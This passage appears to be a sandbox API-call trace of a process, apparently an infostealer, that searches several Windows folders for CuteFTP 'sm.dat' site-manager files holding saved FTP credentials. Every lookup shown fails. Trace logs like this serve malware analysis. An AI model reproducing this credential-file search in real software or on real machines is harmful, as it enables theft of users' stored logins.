dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.021] LocalFree (hMem=0x5ed570) returned 0x0 [0591.021] lstrlenW (lpString="\\*.*") returned 4 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro") returned 57 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x63fb60 [0591.021] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0591.021] LocalFree (hMem=0x63fb60) returned 0x0 [0591.021] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.021] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Lite") returned 25 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5d7c90 [0591.021] lstrlenW (lpString="\\sm.dat") returned 7 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite") returned 58 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed570 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x42 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed688 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x5ed688, nSize=0x42 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat") returned 0x42 [0591.022] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.022] LocalFree (hMem=0x5ed688) returned 0x0 [0591.022] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.022] LocalFree (hMem=0x5ed570) returned 0x0 [0591.022] lstrlenW (lpString="\\*.*") returned 4 [0591.022] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite") returned 58 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x63fb60 [0591.022] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0591.022] LocalFree (hMem=0x63fb60) returned 0x0 [0591.022] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.022] lstrlenW (lpString="\\CuteFTP") returned 8 [0591.022] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed5140 [0591.022] lstrlenW (lpString="\\sm.dat") returned 7 [0591.022] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP") returned 41 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0591.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x31 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2060 [0591.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat", lpDst=0x2ed2060, nSize=0x31 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat") returned 0x31 [0591.022] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.022] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.022] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.022] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.022] lstrlenW (lpString="\\*.*") returned 4 [0591.022] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP") returned 41 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0591.022] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0591.022] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.022] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.022] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.022] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.022] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP") returned 20 [0591.022] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d5258 [0591.022] lstrlenW (lpString="\\sm.dat") returned 7 [0591.022] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP") returned 34 [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed5140 [0591.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2a [0591.022] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed5060 [0591.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x2ed5060, nSize=0x2a | out: lpDst="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat") returned 0x2a [0591.022] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed5060) returned 0x0 [0591.023] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.023] lstrlenW (lpString="\\*.*") returned 4 [0591.023] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP") returned 34 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5977a0 [0591.023] FindFirstFileW (in: lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\*.*", lpFindFileData=0x52e0a0 | out: lpFindFileData=0x52e0a0) returned 0xffffffff [0591.023] LocalFree (hMem=0x5977a0) returned 0x0 [0591.023] LocalFree (hMem=0x5d5258) returned 0x0 [0591.023] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Pro") returned 24 [0591.023] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5977a0 [0591.023] lstrlenW (lpString="\\sm.dat") returned 7 [0591.023] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro") returned 38 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0591.023] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2e [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0148 [0591.023] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x2ed0148, nSize=0x2e | out: lpDst="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat") returned 0x2e [0591.023] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.023] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.023] lstrlenW (lpString="\\*.*") returned 4 [0591.023] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro") returned 38 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x2ed5140 [0591.023] FindFirstFileW (in: lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\*.*", lpFindFileData=0x52e0a0 | out: lpFindFileData=0x52e0a0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.023] LocalFree (hMem=0x5977a0) returned 0x0 [0591.023] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Lite") returned 25 [0591.023] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0591.023] lstrlenW (lpString="\\sm.dat") returned 7 [0591.023] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite") returned 39 [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0591.023] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2f [0591.023] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0591.023] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x2ed0148, nSize=0x2f | out: lpDst="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat") returned 0x2f [0591.023] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.023] CreateFileW (lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\programdata\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.023] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.023] lstrlenW (lpString="\\*.*") returned 4 [0591.023] lstrlenW (lpString="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite") returned 39 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xd8) returned 0x2ed5140 [0591.024] FindFirstFileW (in: lpFileName="C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\*.*", lpFindFileData=0x52e0a0 | out: lpFindFileData=0x52e0a0) returned 0xffffffff [0591.024] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.024] LocalFree (hMem=0x5977a0) returned 0x0 [0591.024] lstrlenW (lpString="\\CuteFTP") returned 8 [0591.024] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0x2ed9918 [0591.024] lstrlenW (lpString="\\sm.dat") returned 7 [0591.024] lstrlenW (lpString="C:\\ProgramData\\CuteFTP") returned 22 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0591.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1e [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b78f0 [0591.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\CuteFTP\\sm.dat", lpDst=0x5b78f0, nSize=0x1e | out: lpDst="C:\\ProgramData\\CuteFTP\\sm.dat") returned 0x1e [0591.024] CreateFileW (lpFileName="C:\\ProgramData\\CuteFTP\\sm.dat" (normalized: "c:\\programdata\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.024] LocalFree (hMem=0x5b78f0) returned 0x0 [0591.024] CreateFileW (lpFileName="C:\\ProgramData\\CuteFTP\\sm.dat" (normalized: "c:\\programdata\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.024] LocalFree (hMem=0x5b7378) returned 0x0 [0591.024] lstrlenW (lpString="\\*.*") returned 4 [0591.024] lstrlenW (lpString="C:\\ProgramData\\CuteFTP") returned 22 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0x2ed7060 [0591.024] FindFirstFileW (in: lpFileName="C:\\ProgramData\\CuteFTP\\*.*", lpFindFileData=0x52e0a0 | out: lpFindFileData=0x52e0a0) returned 0xffffffff [0591.024] LocalFree (hMem=0x2ed7060) returned 0x0 [0591.024] LocalFree (hMem=0x2ed9918) returned 0x0 [0591.024] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.024] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.024] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP") returned 20 [0591.024] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0591.024] lstrlenW (lpString="\\sm.dat") returned 7 [0591.024] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP") returned 51 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5d7c90 [0591.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3b [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x63fb60 [0591.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x63fb60, nSize=0x3b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat") returned 0x3b [0591.024] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.024] LocalFree (hMem=0x63fb60) returned 0x0 [0591.024] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.024] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.024] lstrlenW (lpString="\\*.*") returned 4 [0591.024] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP") returned 51 [0591.024] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0591.024] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\*.*", lpFindFileData=0x52e098 | out: lpFindFileData=0x52e098) returned 0xffffffff [0591.025] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.025] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.025] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Pro") returned 24 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0591.025] lstrlenW (lpString="\\sm.dat") returned 7 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro") returned 55 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5d7c90 [0591.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3f [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x63fb60 [0591.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x63fb60, nSize=0x3f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat") returned 0x3f [0591.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.025] LocalFree (hMem=0x63fb60) returned 0x0 [0591.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.025] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.025] lstrlenW (lpString="\\*.*") returned 4 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro") returned 55 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5d7c90 [0591.025] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\*.*", lpFindFileData=0x52e098 | out: lpFindFileData=0x52e098) returned 0xffffffff [0591.025] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.025] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.025] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Lite") returned 25 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0591.025] lstrlenW (lpString="\\sm.dat") returned 7 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite") returned 56 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x63fb60 [0591.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x40 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x63fc68 [0591.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x63fc68, nSize=0x40 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat") returned 0x40 [0591.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.025] LocalFree (hMem=0x63fc68) returned 0x0 [0591.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.025] LocalFree (hMem=0x63fb60) returned 0x0 [0591.025] lstrlenW (lpString="\\*.*") returned 4 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite") returned 56 [0591.025] LocalAlloc (uFlags=0x40, uBytes=0xfa) returned 0x63fb60 [0591.025] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\*.*", lpFindFileData=0x52e098 | out: lpFindFileData=0x52e098) returned 0xffffffff [0591.025] LocalFree (hMem=0x63fb60) returned 0x0 [0591.025] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.025] lstrlenW (lpString="\\CuteFTP") returned 8 [0591.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.026] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0591.026] lstrlenW (lpString="\\sm.dat") returned 7 [0591.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP") returned 39 [0591.026] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0591.026] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2f [0591.026] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0591.026] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat", lpDst=0x2ed0148, nSize=0x2f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat") returned 0x2f [0591.026] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.026] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.026] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.026] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.026] lstrlenW (lpString="\\*.*") returned 4 [0591.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP") returned 39 [0591.026] LocalAlloc (uFlags=0x40, uBytes=0xd8) returned 0x2ed5140 [0591.026] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\*.*", lpFindFileData=0x52e098 | out: lpFindFileData=0x52e098) returned 0xffffffff [0591.026] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.026] LocalFree (hMem=0x5977a0) returned 0x0 [0591.026] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.026] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.026] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0591.027] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP") returned 20 [0591.027] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x2ed5140 [0591.027] lstrlenW (lpString="\\sm.dat") returned 7 [0591.027] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP") returned 42 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0591.027] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x32 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2060 [0591.027] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x2ed2060, nSize=0x32 | out: lpDst="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat") returned 0x32 [0591.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.027] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 